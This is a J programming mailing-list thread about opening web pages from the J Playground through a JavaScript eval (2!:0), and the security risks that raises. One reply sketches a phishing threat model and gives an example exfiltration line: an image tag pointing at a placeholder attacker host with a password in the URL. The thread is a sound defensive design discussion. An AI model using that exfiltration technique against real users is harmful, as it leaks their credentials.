What is the threat model here, exactly?  Something like this?

- Malicious party provides a link to playground.jsoftware.com/some-j-code

- Naive party is sophisticated enough to check the url before visiting it, 
finds it to be trustworthy

- some-j-code immediately redirects to a phishing site

- User does not notice this time

It doesn't seem _very_ likely. In particular, if somebody knows enough to check what url they are on once, will they not also know to check the url again, when it is prompting them for sensitive information when that is not what they expected the site to do? Contrariwise, if someone does not know to look at urls, then there is no need to piggyback off of the playground in the first place.

The general point is taken--it may be possible to effect something problematic--but it is not yet clear what, and this needs to be balanced against the _value_ of providing access to arbitrary javascript.

Does anyone know if it's possible to sandbox js in the browser? Prevent it from making network requests, both directly ('ajax', I think?), and indirectly eg via adding elements to the page (suppose they build the phishing application directly into the playground app, and then exfiltrate by adding an '<img src=hackers.website/the-password-is-xxx.png>') or opening tabs.

It occurs to me that the problem becomes worse if the playground itself becomes a curator of small j snippets, a la shadertoy.

The specific problem of opening tabs _can_ be solved; do it the way eg youtube does, where the playground will prompt you, saying 'this app is trying to send you to "foo.com"; allow it?'

 -E

On Mon, 6 Jun 2022, Ian Clark wrote:

(retrying -- previous attempt apparently not sent…)

Coupled with some sort of ability for anonymous 3rd parties to contribute
code for others' use, doesn't this feature pose a security risk to the
casual user?

This might arise if the J Playground were to acquire a fan club or a
special-interest group outside Jsoftware's control. E.g. a
social-media-based one.

Sorry, just my nasty suspicious mind at work. I guess this cloud of
suspicion falls on any playground implementation of 2!:0.


On Mon, 6 Jun 2022 at 05:51, Raul Miller <[email protected]> wrote:

2!:0'open("https://www.jsoftware.com")'

Possibly, in the playground we should have browse_j_=: {{2!:0
'open("',y,'")'}}

(Or maybe it would be better to incorporate that concept into the full
definition of browse_j_ ...)

I hope this helps,

--
Raul

On Mon, Jun 6, 2022 at 12:39 AM William Szuch <[email protected]>
wrote:
>
> How can I link to a website from the J Playground?
> In Qt I can use: browse_j_ 'https://www.jsoftware.com'
>
> Bill Szuch
> ----------------------------------------------------------------------
> For information about J forums see http://www.jsoftware.com/forums.htm